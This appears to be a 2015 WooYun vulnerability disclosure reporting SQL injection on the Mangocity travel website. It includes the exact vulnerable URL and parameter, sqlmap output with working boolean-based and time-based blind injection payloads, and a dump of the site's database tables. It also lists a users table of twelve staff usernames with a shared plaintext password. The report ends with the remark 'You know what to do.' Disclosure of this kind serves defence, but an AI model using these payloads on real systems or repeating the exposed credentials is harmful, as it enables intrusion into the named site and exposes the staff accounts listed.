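Bug ID: WooYun-2015-0124848
Title: Mangocity (芒果网) main site SQL injection (large product-information leak + a table storing passwords in plaintext)
Vendor: Mangocity (芒果网)
Author: 安全小飞侠
Submitted: 2015-07-06 17:58
Disclosed: 2015-07-11 18:00
Type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: The vendor was notified of the vulnerability but ignored it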
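2015-07-06: Details sent to the vendor; awaiting vendor handling
2015-07-06: The vendor has viewed the vulnerability; details disclosed to the vendor only
2015-07-11: The vendor actively ignored the vulnerability; details disclosed to the public
Mangocity main site SQL injection (large product-information leak + a table storing passwords in plaintext)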
```
http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=222292p2
Injection parameter: thirdpartid

GET parameter 'thirdpartid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: thirdpartid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: thirdpartid=222292p2' AND 7974=7974 AND 'sVkC'='sVkC

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: thirdpartid=222292p2' AND (SELECT * FROM (SELECT(SLEEP(5)))BnJp) AND 'rusc'='rusc
---
[12:06:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.12
```
```
Database: vacation_init
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| media                       | 120239  |
| product_detail_item         | 74889   |
| product_journey             | 41386   |
| album                       | 35244   |
| product_journey_album       | 28033   |
| product_detail              | 24963   |
| keyword                     | 17194   |
| product_arrival             | 14728   |
| product_departure_month     | 12257   |
| product_departure           | 9594    |
| product_tag                 | 8797    |
| product                     | 8321    |
| product_extra               | 8321    |
| product_album               | 7211    |
| product_lineinfo            | 5202    |
| pm_tui                      | 3125    |
| pm_tui_bak20150618          | 1962    |
| temp_update_product         | 1787    |
| product_accommodation       | 1458    |
| pm_params                   | 1268    |
| terms                       | 797     |
| product_theme               | 598     |
| common_config               | 415     |
| business_module_bak20150419 | 44      |
| business_module             | 43      |
| product_scenery             | 36      |
| users                       | 12      |
| business_type               | 10      |
+-----------------------------+---------+

Table: users
[12 entries]
+--------+-------------+-----------+
| roleId | username    | password  |
+--------+-------------+-----------+
| 0      | chenhuan    | mango2015 |
| 0      | xujia       | mango2015 |
| 0      | wuhongbo    | mango2015 |
| 0      | sunbaoyu    | mango2015 |
| 0      | songwanbing | mango2015 |
| 0      | renxianglin | mango2015 |
| 0      | pengwenhui  | mango2015 |
| 0      | panwei      | mango2015 |
| 0      | liuchunyan  | mango2015 |
| 0      | cms         | mango2015 |
| 0      | chenjie     | mango2015 |
| 0      | zhanglan    | mango2015 |
+--------+-------------+-----------+
```
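You know what to do.
Severity: No impact (ignored by vendor)
Ignored at: 2015-07-11 18:00
Vulnerability Rank: 15 (WooYun rating)
None yet
WooYun: Two SQL injections on Mangocity (passwords stored in plaintext). Isn't this a duplicate of the one from June 30? How did it still get approved?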